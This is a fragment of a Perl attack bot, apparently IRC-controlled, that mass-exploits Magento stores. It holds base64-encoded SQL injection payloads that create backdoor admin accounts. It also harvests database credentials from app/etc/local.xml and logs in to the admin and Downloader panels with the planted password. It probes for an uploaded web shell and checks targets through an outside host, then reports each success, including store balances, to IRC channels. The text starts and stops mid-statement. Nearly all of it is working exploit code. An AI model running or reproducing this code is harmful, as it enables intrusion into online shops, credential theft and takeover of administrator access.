"/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEVSRSB1c2VybmFtZT0nZGxjJztERUxFVEUgRlJPTSBgYWRtaW5fcm9sZWAgV0hFUkUgdXNlcl9pZD02OTY5O0lOU0VSVCBJTlRPIGBhZG1pbl91c2VyYCAoYHVzZXJfaWRgLGBmaXJzdG5hbWVgLGBsYXN0bmFtZWAsYGVtYWlsYCxgdXNlcm5hbWVgLGBwYXNzd29yZGAsYGNyZWF0ZWRgLGBtb2RpZmllZGAsYGxvZ2RhdGVgLGBsb2dudW1gLGByZWxvYWRfYWNsX2ZsYWdgLGBpc19hY3RpdmVgLGBleHRyYWApIFZBTFVFUyAoNjk2OSwnbWFnZW50bycsJ2RldmVsb3BlcicsJ2RldmVsb3BlckBtYWdlbnRvY29tbWVyY2UuY29tJywnZGxjJywnY2ExZTY1MDdhNjMyYjA5ZDUwMDJhZjZiMmZjNzc5ZWU6TVEnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLDEsMCwxLCdOOycpO0lOU0VSVCBJTlRPIGBhZG1pbl9yb2xlYCAoYHBhcmVudF9pZGAsYHRyZWVfbGV2ZWxgLGBzb3J0X29yZGVyYCxgcm9sZV90eXBlYCxgdXNlcl9pZGAsYHJvbGVfbmFtZWApIFZBTFVFUyAoMSwyLDAsJ1UnLDY5NjksJ2RldmVsb3BlcicpOztERUxFVEUgRlJPTSBgbWFnZW50b19hZG1pbl91c2VyYCBXSEVSRSB1c2VybmFtZT0nZGxjJztERUxFVEUgRlJPTSBgbWFnZW50b19hZG1pbl9yb2xlYCBXSEVSRSB1c2VyX2lkPTY5Njk7SU5TRVJUIElOVE8gYG1hZ2VudG9fYWRtaW5fdXNlcmAgKGB1c2VyX2lkYCxgZmlyc3RuYW1lYCxgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbW9kaWZpZWRgLGBsb2dkYXRlYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgKSBWQUxVRVMgKDY5NjksJ21hZ2VudG8nLCdkZXZlbG9wZXInLCdkZXZlbG9wZXJAbWFnZW50b2NvbW1lcmNlLmNvbScsJ2RsYycsJ2NhMWU2NTA3YTYzMmIwOWQ1MDAyYWY2YjJmYzc3OWVlOk1RJywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywxLDAsMSwnTjsnKTtJTlNFUlQgSU5UTyBgbWFnZW50b19hZG1pbl9yb2xlYCAoYHBhcmVudF9pZGAsYHRyZWVfbGV2ZWxgLGBzb3J0X29yZGVyYCxgcm9sZV90eXBlYCxgdXNlcl9pZGAsYHJvbGVfbmFtZWApIFZBTFVFUyAoMSwyLDAsJ1UnLDY5NjksJ2RldmVsb3BlcicpOztERUxFVEUgRlJPTSBgbWFnZV9hZG1pbl91c2VyYCBXSEVSRSB1c2VybmFtZT0nZGxjJztERUxFVEUgRlJPTSBgbWFnZV9hZG1pbl9yb2xlYCBXSEVSRSB1c2VyX2lkPTY5Njk7SU5TRVJUIElOVE8gYG1hZ2VfYWRtaW5fdXNlcmAgKGB1c2VyX2lkYCxgZmlyc3RuYW1lYCxgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbW9kaWZpZWRgLGBsb2dkYXRlYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgKSBWQUxVRVMgKDY5NjksJ21hZ2VudG8nLCdkZXZlbG9wZXInLCdkZXZlbG9wZXJAbWFnZW50b2NvbW1lcmNlLmNvbScsJ2RsYycsJ2NhMWU2NTA3YTYzMmIwOWQ1MDAyYWY2YjJmYzc3OWVlOk1RJywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywxLDAsMSwnTjsnKTtJTlNFUlQgSU5UTyBgbWFnZV9hZG1pbl9yb2xlYCAoYHBhcmVudF9pZGAsYHRyZWVfbGV2ZWxgLGBzb3J0X29yZGVyYCxgcm9sZV90eXBlYCxgdXNlcl9pZGAsYHJvbGVfbmFtZWApIFZBTFVFUyAoMSwyLDAsJ1UnLDY5NjksJ2RldmVsb3BlcicpOztERUxFVEUgRlJPTSBgbWdfYWRtaW5fdXNlcmAgV0hFUkUgdXNlcm5hbWU9J2RsYyc7REVMRVRFIEZST00gYG1nX2FkbWluX3JvbGVgIFdIRVJFIHVzZXJfaWQ9Njk2OTtJTlNFUlQgSU5UTyBgbWdfYWRtaW5fdXNlcmAgKGB1c2VyX2lkYCxgZmlyc3RuYW1lYCxgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbW9kaWZpZWRgLGBsb2dkYXRlYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgKSBWQUxVRVMgKDY5NjksJ21hZ2VudG8nLCdkZXZlbG9wZXInLCdkZXZlbG9wZXJAbWFnZW50b2NvbW1lcmNlLmNvbScsJ2RsYycsJ2NhMWU2NTA3YTYzMmIwOWQ1MDAyYWY2YjJmYzc3OWVlOk1RJywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywxLDAsMSwnTjsnKTtJTlNFUlQgSU5UTyBgbWdfYWRtaW5fcm9sZWAgKGBwYXJlbnRfaWRgLGB0cmVlX2xldmVsYCxgc29ydF9vcmRlcmAsYHJvbGVfdHlwZWAsYHVzZXJfaWRgLGByb2xlX25hbWVgKSBWQUxVRVMgKDEsMiwwLCdVJyw2OTY5LCdkZXZlbG9wZXInKTs7IC0tIA=="; my $cmswy1 = "/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEVSRSB1c2VybmFtZT0nYmxhY2snO0RFTEVURSBGUk9NIGBhZG1pbl9yb2xlYCBXSEVSRSB1c2VyX2lkPTY5Njk7SU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgdXNlcl9pZGAsYGZpcnN0bmFtZWAsYGxhc3RuYW1lYCxgZW1haWxgLGB1c2VybmFtZWAsYHBhc3N3b3JkYCxgY3JlYXRlZGAsYG1vZGlmaWVkYCxgbG9nZGF0ZWAsYGxvZ251bWAsYHJlbG9hZF9hY2xfZmxhZ2AsYGlzX2FjdGl2ZWAsYGV4dHJhYCkgVkFMVUVTICg2OTY5LCdtYWdlbnRvJywnZGV2ZWxvcGVyJywnZGV2ZWxvcGVyQG1hZ2VudG9jb21tZXJjZS5jb20nLCdibGFjaycsJzdkMDdhMWRmODExMGZlNTUwYzZhZDJmODhkM2M3ZTk4JywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywxLDAsMSwnTjsnKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKGBwYXJlbnRfaWRgLGB0cmVlX2xldmVsYCxgc29ydF9vcmRlcmAsYHJvbGVfdHlwZWAsYHVzZXJfaWRgLGByb2xlX25hbWVgKSBWQUxVRVMgKDEsMiwwLCdVJyw2OTY5LCdkZXZlbG9wZXInKTs7IC0tIA=="; # black my $cmswy2 = "/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBtYWdlbnRvX2FkbWluX3VzZXJgIFdIRVJFIHVzZXJuYW1lPSdkbGMnO0RFTEVURSBGUk9NIGBtYWdlbnRvX2FkbWluX3JvbGVgIFdIRVJFIHVzZXJfaWQ9Njk2OTtJTlNFUlQgSU5UTyBgbWFnZW50b19hZG1pbl91c2VyYCAoYHVzZXJfaWRgLGBmaXJzdG5hbWVgLGBsYXN0bmFtZWAsYGVtYWlsYCxgdXNlcm5hbWVgLGBwYXNzd29yZGAsYGNyZWF0ZWRgLGBtb2RpZmllZGAsYGxvZ2RhdGVgLGBsb2dudW1gLGByZWxvYWRfYWNsX2ZsYWdgLGBpc19hY3RpdmVgLGBleHRyYWApIFZBTFVFUyAoNjk2OSwnbWFnZW50bycsJ2RldmVsb3BlcicsJ2RldmVsb3BlckBtYWdlbnRvY29tbWVyY2UuY29tJywnZGxjJywnY2ExZTY1MDdhNjMyYjA5ZDUwMDJhZjZiMmZjNzc5ZWU6TVEnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLDEsMCwxLCdOOycpO0lOU0VSVCBJTlRPIGBtYWdlbnRvX2FkbWluX3JvbGVgIChgcGFyZW50X2lkYCxgdHJlZV9sZXZlbGAsYHNvcnRfb3JkZXJgLGByb2xlX3R5cGVgLGB1c2VyX2lkYCxgcm9sZV9uYW1lYCkgVkFMVUVTICgxLDIsMCwnVScsNjk2OSwnZGV2ZWxvcGVyJyk7OyAtLSA="; # magento_admin_user my $cmswy3 = "/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBtYWdlX2FkbWluX3VzZXJgIFdIRVJFIHVzZXJuYW1lPSdkbGMnO0RFTEVURSBGUk9NIGBtYWdlX2FkbWluX3JvbGVgIFdIRVJFIHVzZXJfaWQ9Njk2OTtJTlNFUlQgSU5UTyBgbWFnZV9hZG1pbl91c2VyYCAoYHVzZXJfaWRgLGBmaXJzdG5hbWVgLGBsYXN0bmFtZWAsYGVtYWlsYCxgdXNlcm5hbWVgLGBwYXNzd29yZGAsYGNyZWF0ZWRgLGBtb2RpZmllZGAsYGxvZ2RhdGVgLGBsb2dudW1gLGByZWxvYWRfYWNsX2ZsYWdgLGBpc19hY3RpdmVgLGBleHRyYWApIFZBTFVFUyAoNjk2OSwnbWFnZW50bycsJ2RldmVsb3BlcicsJ2RldmVsb3BlckBtYWdlbnRvY29tbWVyY2UuY29tJywnZGxjJywnY2ExZTY1MDdhNjMyYjA5ZDUwMDJhZjZiMmZjNzc5ZWU6TVEnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLDEsMCwxLCdOOycpO0lOU0VSVCBJTlRPIGBtYWdlX2FkbWluX3JvbGVgIChgcGFyZW50X2lkYCxgdHJlZV9sZXZlbGAsYHNvcnRfb3JkZXJgLGByb2xlX3R5cGVgLGB1c2VyX2lkYCxgcm9sZV9uYW1lYCkgVkFMVUVTICgxLDIsMCwnVScsNjk2OSwnZGV2ZWxvcGVyJyk7OyAtLSA="; # mage_admin_user my $cmswy4 = "/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBtZ19hZG1pbl91c2VyYCBXSEVSRSB1c2VybmFtZT0nZGxjJztERUxFVEUgRlJPTSBgbWdfYWRtaW5fcm9sZWAgV0hFUkUgdXNlcl9pZD02OTY5O0lOU0VSVCBJTlRPIGBtZ19hZG1pbl91c2VyYCAoYHVzZXJfaWRgLGBmaXJzdG5hbWVgLGBsYXN0bmFtZWAsYGVtYWlsYCxgdXNlcm5hbWVgLGBwYXNzd29yZGAsYGNyZWF0ZWRgLGBtb2RpZmllZGAsYGxvZ2RhdGVgLGBsb2dudW1gLGByZWxvYWRfYWNsX2ZsYWdgLGBpc19hY3RpdmVgLGBleHRyYWApIFZBTFVFUyAoNjk2OSwnbWFnZW50bycsJ2RldmVsb3BlcicsJ2RldmVsb3BlckBtYWdlbnRvY29tbWVyY2UuY29tJywnZGxjJywnY2ExZTY1MDdhNjMyYjA5ZDUwMDJhZjZiMmZjNzc5ZWU6TVEnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLDEsMCwxLCdOOycpO0lOU0VSVCBJTlRPIGBtZ19hZG1pbl9yb2xlYCAoYHBhcmVudF9pZGAsYHRyZWVfbGV2ZWxgLGBzb3J0X29yZGVyYCxgcm9sZV90eXBlYCxgdXNlcl9pZGAsYHJvbGVfbmFtZWApIFZBTFVFUyAoMSwyLDAsJ1UnLDY5NjksJ2RldmVsb3BlcicpOzsgLS0g"; # mg_admin_user if(my $pid = fork){ waitpid($pid, 0); } else { if(fork){ exit; } else { &Query("http://".$site."/admin/".$cmswy1); &Query("http://".$site."index.php/admin/".$cmswy1); my $situs = "http://".$site."downloader/index.php"; my $check = &Query($situs); if($check =~ /Magento Downloader/i) { my $package; my $chkurl = &ReadLogs("MSL.URL",md5_hex($site)); if($chkurl == 0){ my $res = &mslAdmin($situs); if($res =~ /form\.install_package_id\.value/i){ $package.="[ 3Login success ]"; } if($res =~ /File_System/i){ $package.="[ 13File_System ]"; } if($res =~ /kontol_module/i){ $package.="[ 13kontol_module ]"; } if($res =~ /Grizzly3_MassEmail/i){ $package.="[ 13Grizzly3_MassEmail ]"; } if($res =~ /Grizzly_MassEmail/i){ $package.="[ 13Grizzly_MassEmail ]"; } if($res =~ /LibMagen_Ext/i){ $package.="[ 13LibMagen_Ext ]"; } if($res =~ /Magento_Mass/i){ $package.="[ 13Exploiter ]"; } if($res =~ /not have sufficient write permission/i){ $package.="[ 4Permission denied ]"; } if($package){ if($package !~ /Permission denied/){ &msg("$admin","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] ".$package); &msg("$wakil","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] ".$package); } &msg("$channel","![4SHOPLIFT]! [ 12Success ] ".$package); &WriteLogs("MSL.URL",md5_hex($site)); &chkdownload($site,$dirs,$chan,$engine); } else { &msxAdmin($site); } } else { &msg("$channel","![13X]! skipping: 14".$site." ![13*]!"); } my $magen = &Query($magmo); if($magen =~ /dbname/i){ my $chkurl = &ReadLogs("MSL.URL",md5_hex($site)); if($chkurl == 0){ if($magen =~ /host?\s\=?\s\"(.*)\"/i) { $hozz = $1; } if($magen =~ /dbname?\s\=?\s\"(.*)\"/i) { $base = $1; } if($magen =~ /user?\s\=?\s\"(.*)\"/i) { $user = $1; } if($magen =~ /password?\s\=?\s\"(.*)\"/i) { $pass = $1; } &mageAuth($site, $hozz, $user, $pass, $base); &mageDown($site); if($sqlview == 1){ &mageSQL($site, $hozz, $user, $pass, $base); &dbConnect($site, $hozz, $user, $pass, $base); } else { &Query("http://".$site."/admin/".$cmswy1); my $sitos = "http://".$site."downloader/index.php"; my $testa = "http://www.globalrelax.it//wp-admin/includes/tmpx/conf.php?target=http://".$site."/"; my $choock = &mslAdmin($sitos); if($choock =~ /Magento Downloader/i) { my $htmla = &Query($testa); &Query($sitos); if ($htmla =~ /is vulnerable/) { my $xteam = "http://".$site."/cloud.php"; my $oscheck = &Query($xteam."?silk"); if ($oscheck =~ /Uname : (.*?)<\/B><BR>/i){ $infeno = $1; } &msg("$chanx","![4SHOPLIFT]! [ 12Shell ] [ 14Uname:".$infeno." ]"); &msg("$admin","![4MSL-Vuln]! [ 14".$infeno." ] [12 http://".$xteam."?silk ] $dork "); &msg("$wakil","![4MSL-Vuln]! [ 14".$infeno." ] [12 http://".$xteam."?silk ] $dork "); } } } } } my $magon = &Query($magma); if($magon =~ /dbname/i){ my $chkurl = &ReadLogs("MSL.URL",md5_hex($site)); if($chkurl == 0){ if($magon =~ /host?\s\=?\s\"(.*)\"/i) { $hozz = $1; } if($magon =~ /dbname?\s\=?\s\"(.*)\"/i) { $base = $1; } if($magon =~ /user?\s\=?\s\"(.*)\"/i) { $user = $1; } if($magon =~ /password?\s\=?\s\"(.*)\"/i) { $pass = $1; } &mageAuth($site, $hozz, $user, $pass, $base); &mageDown($site); if($sqlview == 1){ &mageSQL($site, $hozz, $user, $pass, $base); &dbConnect($site, $hozz, $user, $pass, $base); } } } my $htmlx = &Query($testx); if($htmlx =~ /dbname/i){ my $chkurl = &ReadLogs("MSL.URL",md5_hex($site)); if($chkurl == 0){ if($htmlx =~ /host><\!\[\[CDATA\[(.*?)\]\]><\/host/i){ $hoss = $1; } if($htmlx =~ /username><\!\[CDATA\[(.*?)\]\]><\/username/i){ $uzer = $1; } if($htmlx =~ /password><\!\[CDATA\[(.*?)\]\]><\/password/i){ $pazz = $1; } if($htmlx =~ /frontName><\!\[CDATA\[(.*?)\]\]><\/frontName/i){ $dirz = $1; } if($htmlx =~ /table_prefix><\!\[CDATA\[(.*?)\]\]><\/table_prefix/i){ $pref = $1; } if($htmlx =~ /dbname><\!\[CDATA\[(.*?)\]\]><\/dbname/i){ $baze = $1; } &msg("$channel","![13X]! Exploiting (1): 14".$site.$dirz." ![13*]!"); &mageAuth($site, $hoss, $uzer, $pazz, $baze); &mageDown($site); if($sqlview == 1){ &mageSQL($site, $hoss, $uzer, $pazz, $baze); &dbConnect($site, $hoss, $uzer, $pazz, $baze); } &Query("http://".$site.$dirz.$cmswy1); my $sites = "http://".$site."downloader/index.php"; my $chock = &Query($sites); if($chock =~ /Magento Downloader/i) { my $res = &mslAdmin($sites); if($res =~ /Return to Admin/i) { &msg("$admin","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 12http://".$site.$dirz." ] [ 3Login success ]"); &msg("$wakil","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 12http://".$site.$dirz." ] [ 3Login success ]"); &msg("$channel","![4SHOPLIFT]! [ 3Login success ]"); &WriteLogs("MSL.URL",md5_hex($site)); } } my $sitas = "http://".$site.$dirz; my $chack = &Query($sitas); if($chack =~ /Password/i) { &msg("$channel","![13X]! Exploiting (2): 14".$site.$dirz." ![13*]!"); my $res = &mslAdmin($sitez); if($res =~ /Dashboard/i) { &msg("$admin","![7SHOPLIFT]! [ 12http://".$site.$dirz." ] [ 7Directory ]"); &msg("$wakil","![7SHOPLIFT]! [ 12http://".$site.$dirz." ] [ 7Directory ]"); &msg("$channel","![7SHOPLIFT]! [ 12Found ] [ 7Directory ]"); &WriteLogs("MSL.URL",md5_hex($site)); } } } } my $magun = &Query($magme); if($magun =~ /dbname/i){ my $chkurl = &ReadLogs("MSL.URL",md5_hex($site)); if($chkurl == 0){ if($magun =~ /host><\!\[\[CDATA\[(.*?)\]\]><\/host/i){ $huss = $1; } if($magun =~ /username><\!\[CDATA\[(.*?)\]\]><\/username/i){ $uzir = $1; } if($magun =~ /password><\!\[CDATA\[(.*?)\]\]><\/password/i){ $puzz = $1; } if($magun =~ /frontName><\!\[CDATA\[(.*?)\]\]><\/frontName/i){ $dorz = $1; } if($magun =~ /table_prefix><\!\[CDATA\[(.*?)\]\]><\/table_prefix/i){ $praf = $1; } if($magun =~ /dbname><\!\[CDATA\[(.*)\]\]><\/dbname/i){ $bazi = $1; } &msg("$channel","![13X]! Exploiting (3): 14".$site.$dorz." ![13*]!"); &mageAuth($site, $huss, $uzir, $puzz, $bazi); &mageDown($site); if($sqlview == 1){ &mageSQL($site, $huss, $uzir, $puzz, $bazi); &dbConnect($site, $huss, $uzir, $puzz, $bazi); } &Query("http://".$site.$dorz.$cmswy1); my $sitez = "http://".$site."downloader/"; my $zhock = &Query($sitez); if($zhock =~ /Magento Downloader/i) { my $res = &mslAdmin($sitez); if($res =~ /Return to Admin/i) { &msg("$admin","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 12http://".$site.$dorz." ] [ 3Login success ]"); &msg("$wakil","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 12http://".$site.$dorz." ] [ 3Login success ]"); &msg("$channel","![4SHOPLIFT]! [ 3Login success ]"); &WriteLogs("MSL.URL",md5_hex($site)); } } my $sitaz = "http://".$site.$dorz; my $chack = &Query($sitaz); if($chack =~ /Password/i) { &msg("$channel","![13X]! Exploiting (4): 14".$site.$dorz." ![13*]!"); my $res = &mslAdmin($sitaz); if($res =~ /Dashboard/i) { &msg("$admin","![4SHOPLIFT]! [ 12http://".$site.$dorz." ] [ 7Admin page ]"); &msg("$wakil","![4SHOPLIFT]! [ 12http://".$site.$dorz." ] [ 7Admin page ]"); &msg("$channel","![4SHOPLIFT]! [ 12Found ] [ 7Admin page ]"); &WriteLogs("MSL.URL",md5_hex($site)); } } } } my $axxem = &mageQuery($tostx, "app/etc/local.xml"); if($axxem =~ /host><\!\[CDATA\[(.*?)\]\]><\/host/i){ $xozz = $1; if($axxem =~ /username><\!\[CDATA\[(.*?)\]\]><\/username/i){ $xser = $1; } if($axxem =~ /password><\!\[CDATA\[(.*?)\]\]><\/password/i){ $xass = $1; } if($axxem =~ /dbname><\!\[CDATA\[(.*?)\]\]><\/dbname/i){ $xase = $1; } if($axxem =~ /frontName><\!\[CDATA\[(.*?)\]\]><\/frontName/i){ $dirx = $1; } if($axxem =~ /table_prefix><\!\[CDATA\[(.*?)\]\]><\/table_prefix/i){ $pfix = $1; } my $chkurl = &ReadLogs("MSL.URL",md5_hex($site)); if($chkurl == 0){ &msg("$channel","![4X]! Exploiting (5): 14".$site." ![13*]!"); if($mageforce == 0){ &mageConnect($tostx); &mageAuth($site, $xozz, $xser, $xass, $xase); if($sqlview == 1){ &mageSQL($site, $xozz, $xser, $xass, $xase); } } else { &mageBrute($site, $tostx); } &Query("http://".$site.$dirx.$cmswy1); my $sitix = "http://".$site."downloader/index.php"; my $res = &mslAdmin($sitix); if($res =~ /Return to Admin/i) { &msg("$admin","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 3Login success ]"); &msg("$wakil","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 3Login success ]"); &msg("$channel","![4SHOPLIFT]! [ 3Login success ]"); &WriteLogs("MSL.URL",md5_hex($site)); } my $satos = "http://".$site.$dirx; my $chick = &Query($satos); if($chick =~ /Password/i) { &msg("$channel","![4X]! Exploiting (6): 14".$site." ![13*]!"); my $res = &mslAdmin($satos); if($res =~ /Dashboard/i) { &msg("$admin","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 12http://".$site.$dirx." ] [ 3Login success ]"); &msg("$wakil","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 12http://".$site.$dirx." ] [ 3Login success ]"); &msg("$channel","![4SHOPLIFT]! [ 3Login success ]"); &WriteLogs("MSL.URL",md5_hex($site)); } my $testsql = "http://".$site."admin/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEVSRSB1c2VybmFtZT0nYmxhY2snO0RFTEVURSBGUk9NIGBhZG1pbl9yb2xlYCBXSEVSRSB1c2VyX2lkPTY5Njk7SU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgdXNlcl9pZGAsYGZpcnN0bmFtZWAsYGxhc3RuYW1lYCxgZW1haWxgLGB1c2VybmFtZWAsYHBhc3N3b3JkYCxgY3JlYXRlZGAsYG1vZGlmaWVkYCxgbG9nZGF0ZWAsYGxvZ251bWAsYHJlbG9hZF9hY2xfZmxhZ2AsYGlzX2FjdGl2ZWAsYGV4dHJhYCkgVkFMVUVTICg2OTY5LCdtYWdlbnRvJywnZGV2ZWxvcGVyJywnZGV2ZWxvcGVyQG1hZ2VudG9jb21tZXJjZS5jb20nLCdibGFjaycsJzdkMDdhMWRmODExMGZlNTUwYzZhZDJmODhkM2M3ZTk4JywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywxLDAsMSwnTjsnKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKGBwYXJlbnRfaWRgLGB0cmVlX2xldmVsYCxgc29ydF9vcmRlcmAsYHJvbGVfdHlwZWAsYHVzZXJfaWRgLGByb2xlX25hbWVgKSBWQUxVRVMgKDEsMiwwLCdVJyw2OTY5LCdkZXZlbG9wZXInKTs7IC0tIA=="; my $fz = &get_content($testsql); my $url = "http://".$site."/admin/index.php"; my $check = &get_content($url); if($check =~ /<input name="form_key" type="hidden" value="(.*?)" \/>/g) { my $username = "black"; my $password = "panthers"; my $key = $1; my $ua = LWP::UserAgent->new( keep_alive => 1, timeout => 120, agent => $uagent ); $ua->requests_redirectable(['GET', 'HEAD', 'POST']); $ua->max_redirect(5); $ua->cookie_jar(HTTP::Cookies->new(file => "cookies.txt", autosave => 1)); my $response = $ua->request( POST "$url", Content_Type => 'form-data', Content => [ "login[username]" => $username, "login[password]" => $password, "form_key" => $key ] ); my $res = $response->content; if($res =~ /<span class="price">(.*?)<\/span>/g) { my $price = $1; my $url2 = "http://".$site."/downloader"; my $ua2 = LWP::UserAgent->new( keep_alive => 1, timeout => 120, agent => $uagent ); $ua2->requests_redirectable(['GET', 'HEAD', 'POST']); $ua2->max_redirect(5); $ua2->cookie_jar(HTTP::Cookies->new(file => "cookies.txt", autosave => 1)); my $response2 = $ua2->request( POST "$url2", Content_Type => 'form-data', Content => [ "username" => $username, "password" => $password ] ); my $res2 = $response2->content; if($res2 =~ /Log Out/ig || $res2 =~/Return to Admin/ig) { my $filesystem = ($res2 =~ /File_System/ig) ? "Exists" : "Not exists"; my $permission = ($res2 =~ /Warning: Your Magento folder does not have sufficient write permissions/ig) ? 'Denied' : 'Writable'; sleep(3); my $m_fs = ($filesystem eq "Exists") ? "9Installed" : "0Not Found"; my $m_perm = ($permission eq "Denied") ? "4Denied" : "9Writable"; #my $out = ($res2 =~ /Warning: Your Magento folder does not have sufficient write permissions/ig) ? 'Denied' : 'Writable'; #my $fs = ($res2 =~ /File_System/ig) ? "Installed" : "Not Install"; &msg("$admin","![4SHOPLIFT]! 12".$url." 4<9=4> 12 File_System = $m_fs & Downloader = $m_perm  black panthers![13*]!"); &msg("$channel","![4SHOPLIFT]! 12LOGIN11 [8Success11]12 Balance11 [9 ".$price." 11]12 File_System = $m_fs14 &12 Downloader = $m_perm  ![13*]!"); } } } } } } my $axxem = &mageQuery($tastx, "app/etc/local.xml"); if($axxem =~ /host><\!\[CDATA\[(.*?)\]\]><\/host/i){ $xozz = $1; if($axxem =~ /username><\!\[CDATA\[(.*?)\]\]><\/username/i){ $xser = $1; } if($axxem =~ /password><\!\[CDATA\[(.*?)\]\]><\/password/i){ $xass = $1; } if($axxem =~ /dbname><\!\[CDATA\[(.*?)\]\]><\/dbname/i){ $xase = $1; } if($axxem =~ /frontName><\!\[CDATA\[(.*?)\]\]><\/frontName/i){ $dirx = $1; } if($axxem =~ /table_prefix><\!\[CDATA\[(.*?)\]\]><\/table_prefix/i){ $pfix = $1; } my $chkurl = &ReadLogs("MSL.URL",md5_hex($site)); if($chkurl == 0){ &msg("$channel","![4X]! Exploiting (7): 14".$site." ![13*]!"); if($mageforce == 0){ &mageConnect($tastx); &mageAuth($site, $xozz, $xser, $xass, $xase); if($sqlview == 1){ &mageSQL($site, $xozz, $xser, $xass, $xase); } } my $testsql = 